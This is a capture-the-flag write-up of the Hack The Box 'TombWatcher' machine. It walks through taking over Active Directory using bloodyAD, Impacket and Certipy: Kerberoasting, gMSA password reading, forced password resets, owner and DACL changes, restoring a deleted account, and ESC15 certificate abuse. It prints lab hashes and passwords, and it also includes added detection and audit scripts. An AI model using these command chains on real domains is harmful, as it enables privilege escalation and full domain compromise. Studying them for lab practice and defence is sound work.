Box Info
| Name | Difficulty |
|---|---|
| TombWatcher | Medium |
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
user flag
I could not find any vulnerability on SMB, so I moved on to BloodHound.


Checking bloodhound-quickwin showed that the SAM user holds WriteOwner over JOHN, and that the JOHN user is a member of the REMOTE MANAGEMENT USERS group.
So I set the henry user as the start node and JOHN as the end node, and BloodHound printed the path below.

1.1 WriteSPN

I carried out the attack following the command shown in BloodHound.
targetedKerberoast.py is a tool that automates the Kerberoast technique: in an Active Directory environment it requests Kerberos service tickets (TGS) for accounts that have an SPN registered and extracts the encrypted hash from each ticket it obtains.


| user | password |
|---|---|
| Alfred | basketball |
1.2 AddSelf

Add the alfred user to the INFRASTRUCTURE group:
```
[Oct 20, 2025 - 21:00:39 (KST)] exegol-htb
TombWatcher # bloodyAD --host 'tombwatcher.htb' -d 'dc01.tombwatcher.htb' -u 'alfred' -p 'basketball' add groupMember 'INFRASTRUCTURE' 'alfred'
[+] alfred added to INFRASTRUCTURE
```
1.3 ReadGMSAPassword

```
[Oct 20, 2025 - 21:16:30 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "alfred" -p "basketball" get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:bf8b11e301f7ba3fdc616e5d4fa01c30
msDS-ManagedPassword.B64ENCODED: hTHfon3m4u5bkUTSlOKiTcVGqaIiYqe4SrrDZd8uUEmyGMin8X1qKy6L5ZHVlsvRp17h6l5hC0OqLxYV/WGcmmGom+hqBklNY+MSgPO2r8SUnGniBbV3VR2C6pak3TJxRHd+4yb8iNDsLLgEG/goJ8yVoaaYpQppZWEOtE9EvQLV0nYjWoReut1xHZ1QP/kmHL6hOGrASDo2FIgXRQmEzjyatED/Zdz7s3mfB3OuOWxQUiyd4tic2RFKHEjurhJXN8iuVh0jPJzyWqEiF+5+ZYDckA52ICoIN9JhyAxH3R6Ftqjok3Xc524zjHBiE3Fb7ZMBtNkjobLCxW3976E1yw==
```
1.4 ForceChangePassword
```
[Oct 21, 2025 - 16:52:04 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "ansible_dev$" -p :bf8b11e301f7ba3fdc616e5d4fa01c30 set password "sam" 'password123'
[+] Password changed successfully!
```
1.5 WriteOwner
Change the owner of the john account to sam with owneredit.py, then grant FullControl to sam with dacledit.py:
```
[Oct 21, 2025 - 17:19:54 (KST)] exegol-htb
TombWatcher # owneredit.py -action write -target 'john' -new-owner 'sam' tombwatcher.htb/sam:password123
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-1105
[*] - sAMAccountName: sam
[*] - distinguishedName: CN=sam,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
```
```
[Oct 21, 2025 - 17:19:16 (KST)] exegol-htb
TombWatcher # dacledit.py -action write -rights FullControl -principal sam -target john tombwatcher.htb/sam:password123
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20251021-171935.bak
[*] DACL modified successfully!
```
```
[Oct 21, 2025 - 17:19:45 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p 'password123' set password "john" 'password123'
[+] Password changed successfully!
```
get flag
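From the defender's side, every step of the chain above (Kerberoast, AddSelf, gMSA password read, ForceChangePassword, WriteOwner/WriteDacl) leaves a distinct Security event on the domain controller. The script below is an added example, not part of the original writeup: it correlates a handful of constructed event records into the same henry-to-john path that BloodHound drew. The field names (`user`, `target`, `attr`, `etype`) are simplified stand-ins for the EventData names of the real events, and the records themselves are constructed.

```python
"""Correlate Windows Security events into an ACL-abuse chain.
Added example; events are constructed and field names are simplified."""
from collections import defaultdict, deque

# Constructed events in the order a SIEM would receive them.
EVENTS = [
    # 4769: TGS requested with RC4 (0x17) for a user SPN -> Kerberoast candidate
    {"id": 4769, "user": "henry", "service": "alfred", "etype": "0x17"},
    # 4728: actor adds itself to a security-enabled global group (AddSelf)
    {"id": 4728, "user": "alfred", "target": "INFRASTRUCTURE", "member": "alfred"},
    # 4662: msDS-ManagedPassword read on a gMSA (only logged if the object has a SACL)
    {"id": 4662, "user": "alfred", "target": "ANSIBLE_DEV$", "attr": "msDS-ManagedPassword"},
    # 4724: password reset on another account (ForceChangePassword)
    {"id": 4724, "user": "ansible_dev$", "target": "sam"},
    # 5136: nTSecurityDescriptor modified -> owner or DACL rewritten
    {"id": 5136, "user": "sam", "target": "john", "attr": "nTSecurityDescriptor"},
    {"id": 4724, "user": "sam", "target": "john"},
    # Noise: AES ticket for krbtgt, and an admin adding someone else to a group
    {"id": 4769, "user": "svc_backup", "service": "krbtgt", "etype": "0x12"},
    {"id": 4728, "user": "administrator", "target": "INFRASTRUCTURE", "member": "bob"},
]


def is_roast_candidate(ev):
    """RC4 service ticket for a user SPN (not krbtgt, not a machine account)."""
    return (ev["id"] == 4769 and ev.get("etype") == "0x17"
            and ev["service"] != "krbtgt" and not ev["service"].endswith("$"))


def is_self_add(ev):
    """Group-membership add where the member being added is the actor itself."""
    return ev["id"] in (4728, 4732, 4756) and ev["member"].lower() == ev["user"].lower()


def control_edges(events):
    """Turn events into (actor, target, technique) edges: actor gained control of target."""
    edges = []
    for ev in events:
        actor = ev["user"]
        if is_roast_candidate(ev):
            edges.append((actor, ev["service"], "Kerberoast (RC4 TGS)"))
        elif is_self_add(ev):
            edges.append((actor, ev["target"], "AddSelf"))
        elif ev["id"] == 4662 and ev.get("attr") == "msDS-ManagedPassword":
            edges.append((actor, ev["target"], "ReadGMSAPassword"))
        elif ev["id"] == 4724:
            edges.append((actor, ev["target"], "ForceChangePassword"))
        elif ev["id"] == 5136 and ev.get("attr") == "nTSecurityDescriptor":
            edges.append((actor, ev["target"], "WriteOwner/WriteDacl"))
    return edges


def escalation_path(events, start, goal):
    """BFS over control edges; returns [(actor, technique, target), ...] or None."""
    graph = defaultdict(list)
    for src, dst, how in control_edges(events):
        graph[src.lower()].append((dst.lower(), how))
    start, goal = start.lower(), goal.lower()
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            steps = []
            while parent[node] is not None:
                prev, how = parent[node]
                steps.append((prev, how, node))
                node = prev
            return steps[::-1]
        for nxt, how in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, how)
                queue.append(nxt)
    return None


if __name__ == "__main__":
    for actor, how, target in escalation_path(EVENTS, "henry", "john") or []:
        print(f"{actor} --[{how}]--> {target}")
```

Two of these events only exist if auditing is configured: 5136 requires the "Directory Service Changes" audit subcategory, and 4662 for the gMSA password read requires a SACL on the gMSA object (or the container) for the msDS-ManagedPassword property. Without those, the owner change and the password read happen silently and the chain cannot be reconstructed from the DC logs.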

root flag
```
[Oct 21, 2025 - 15:03:47 (KST)] exegol-htb
lpe # certipy find -u [email protected] -p 'password123' -dc-ip 10.10.11.72
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20251021150415_Certipy.txt'
[*] Wrote text output to '20251021150415_Certipy.txt'
[*] Saving JSON output to '20251021150415_Certipy.json'
[*] Wrote JSON output to '20251021150415_Certipy.json'
```
After connecting over WinRM as john I could not find an attack vector, so while scanning the john account for vulnerabilities with certipy I noticed the SID above.
Looking it up, that message means "a SID is registered as holding a permission, but no user or group matching that SID can currently be found in Active Directory".
I tried a restore with the john account, which holds GenericAll, the highest privilege among the accounts I had access to, and it succeeded.
restore SID
```
[Oct 21, 2025 - 16:19:35 (KST)] exegol-htb
lpe # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' set restore "S-1-5-21-1392491010-1358638721-2126982587-1111"
[+] S-1-5-21-1392491010-1358638721-2126982587-1111 has been restored successfully under CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
```
After the restore succeeded I tried to change the cert_admin account's password with the john account, but the account was disabled, so I enabled it first and then reset the password.
remove ACCOUNTDISABLE flags
```
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' remove uac 'cert_admin' -f ACCOUNTDISABLE
[+] ['ACCOUNTDISABLE'] property flags removed from cert_admin's userAccountControl
```
set cert_admin password
```
[Oct 22, 2025 - 20:43:43 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' set password "cert_admin" 'password123'
[+] Password changed successfully!
```
ESC15
```
[Oct 22, 2025 - 20:54:06 (KST)] exegol-htb
TombWatcher # certipy find -vulnerable -u [email protected] -p 'password123' -dc-ip 10.10.11.72
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[!] Failed to get CA configuration for 'tombwatcher-CA-1' via RRP: [Errno 22] Invalid argument
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20251022205429_Certipy.txt'
[*] Wrote text output to '20251022205429_Certipy.txt'
[*] Saving JSON output to '20251022205429_Certipy.json'
[*] Wrote JSON output to '20251022205429_Certipy.json'
```
```
[Oct 22, 2025 - 20:54:30 (KST)] exegol-htb
TombWatcher # cat 20251022205429_Certipy.txt
Certificate Authorities
  0
    CA Name                         : tombwatcher-CA-1
    DNS Name                        : DC01.tombwatcher.htb
    Certificate Subject             : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number       : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start      : 2024-11-16 00:47:48+00:00
    Certificate Validity End        : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                     : False
      HTTPS
        Enabled                     : False
    User Specified SAN              : Unknown
    Request Disposition             : Unknown
    Enforce Encryption for Requests : Unknown
    Active Policy                   : Unknown
    Disabled Extensions             : Unknown
Certificate Templates
  0
    Template Name                   : WebServer
    Display Name                    : Web Server
    Certificate Authorities         : tombwatcher-CA-1
    Enabled                         : True
    Client Authentication           : False
    Enrollment Agent                : False
    Any Purpose                     : False
    Enrollee Supplies Subject       : True
    Certificate Name Flag           : EnrolleeSuppliesSubject
    Extended Key Usage              : Server Authentication
    Requires Manager Approval       : False
    Requires Key Archival           : False
    Authorized Signatures Required  : 0
    Schema Version                  : 1
    Validity Period                 : 2 years
    Renewal Period                  : 6 weeks
    Minimum RSA Key Length          : 2048
    Template Created                : 2024-11-16T00:57:49+00:00
    Template Last Modified          : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights           : TOMBWATCHER.HTB\Domain Admins
                                      TOMBWATCHER.HTB\Enterprise Admins
                                      TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                       : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals     : TOMBWATCHER.HTB\Domain Admins
                                      TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals      : TOMBWATCHER.HTB\Domain Admins
                                      TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals       : TOMBWATCHER.HTB\Domain Admins
                                      TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll       : TOMBWATCHER.HTB\Domain Admins
                                      TOMBWATCHER.HTB\Enterprise Admins
                                      TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals  : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                         : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                         : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
```
WinRM access did not work, so I ran a vulnerability scan with certipy and found the ESC15 vulnerability.
ESC15 Vulnerability: an attack that abuses a logic flaw in old (Schema v1) certificate templates. When requesting a certificate, the attacker can inject a powerful EKU (usage) such as "Client Authentication" into a specific field called **Application Policies**. The CA accepts the injected EKU without validation and issues the certificate, and the attacker uses that certificate to take over Domain Admin privileges.
I carried out the attack by following the site above.
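Both root-flag findings are things a template audit can catch before an attacker does: the ESC15 preconditions Certipy reports (schema version 1, EnrolleeSuppliesSubject, no manager approval) and the "Failed to lookup object with SID" line, which is an Enroll ACE pointing at a deleted object that is still restorable. The script below is an added example, not part of the original writeup or of Certipy; it evaluates constructed template records that use the LDAP attribute names of pKICertificateTemplate objects, against a constructed SID directory. The domain SID is the one from the writeup; RIDs 512 and 519 are the well-known Domain Admins and Enterprise Admins RIDs, and the template names other than WebServer are invented.

```python
"""Audit certificate templates for ESC15 preconditions and orphaned Enroll ACEs.
Added example; template records and the SID directory are constructed."""

DOMAIN_SID = "S-1-5-21-1392491010-1358638721-2126982587"  # from the writeup

# Bit flags from the pKICertificateTemplate schema
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval

# Constructed principal directory: SIDs the DC resolves, and tombstoned objects
LIVE_PRINCIPALS = {
    f"{DOMAIN_SID}-512": "Domain Admins",
    f"{DOMAIN_SID}-519": "Enterprise Admins",
}
DELETED_OBJECTS = {f"{DOMAIN_SID}-1111": "cert_admin"}  # still in Deleted Objects

# Constructed templates; "enroll_sids" stands in for the Enroll ACEs of the template DACL
TEMPLATES = [
    {"cn": "WebServer", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0,
     "enroll_sids": [f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-519", f"{DOMAIN_SID}-1111"]},
    {"cn": "WebServer-Hardened", "msPKI-Template-Schema-Version": 1,  # invented name
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
     "enroll_sids": [f"{DOMAIN_SID}-512"]},
    {"cn": "ModernWeb", "msPKI-Template-Schema-Version": 2,  # invented name
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0,
     "enroll_sids": [f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-9999"]},
]


def esc15_findings(template):
    """ESC15 needs all three: schema v1, enrollee-supplied subject, no approval gate."""
    schema_v1 = template["msPKI-Template-Schema-Version"] == 1
    supplies_subject = bool(template["msPKI-Certificate-Name-Flag"]
                            & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    manager_approval = bool(template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    if schema_v1 and supplies_subject and not manager_approval:
        return ["ESC15: schema v1 template with enrollee-supplied subject and no manager "
                "approval; exploitable on CAs missing the CVE-2024-49019 patch. Fix: patch "
                "the CA, and either clear EnrolleeSuppliesSubject or require manager approval."]
    return []


def orphaned_aces(template):
    """Return (sid, status) for every Enroll ACE whose SID is not a live principal."""
    results = []
    for sid in template["enroll_sids"]:
        if sid in LIVE_PRINCIPALS:
            continue
        status = "deleted (restorable)" if sid in DELETED_OBJECTS else "unresolvable"
        results.append((sid, status))
    return results


def audit(templates):
    """Map template CN -> list of human-readable findings (empty list means clean)."""
    report = {}
    for t in templates:
        findings = esc15_findings(t)
        for sid, status in orphaned_aces(t):
            findings.append(f"Orphaned Enroll ACE for {sid} ({status}); remove the ACE and, "
                            "if the object is still in Deleted Objects, purge it so it cannot "
                            "be restored with its old rights.")
        report[t["cn"]] = findings
    return report


if __name__ == "__main__":
    for cn, findings in audit(TEMPLATES).items():
        print(cn, "->", findings or ["clean"])
```

The orphaned-ACE check is the part that would have caught this box's root path: the ACE survived the account's deletion, and anyone able to restore the deleted object inherited enrollment rights on a template that had no approval gate. Removing the ACE, or purging the object from Deleted Objects, closes that path independently of the ESC15 patch state.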
Scenario A
```
certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -upn '[email protected]' -sid 'S-1-5-21-1392491010-1358638721-2126982587-1111' \
    -application-policies 'Client Authentication'

certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
```
While running the first attack I hit the error shown in the picture.
In the end I could not find a fix for it, so I switched to Scenario B.
Scenario B
```
certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -application-policies 'Certificate Request Agent'

certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'User' \
    -pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'

certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'
```
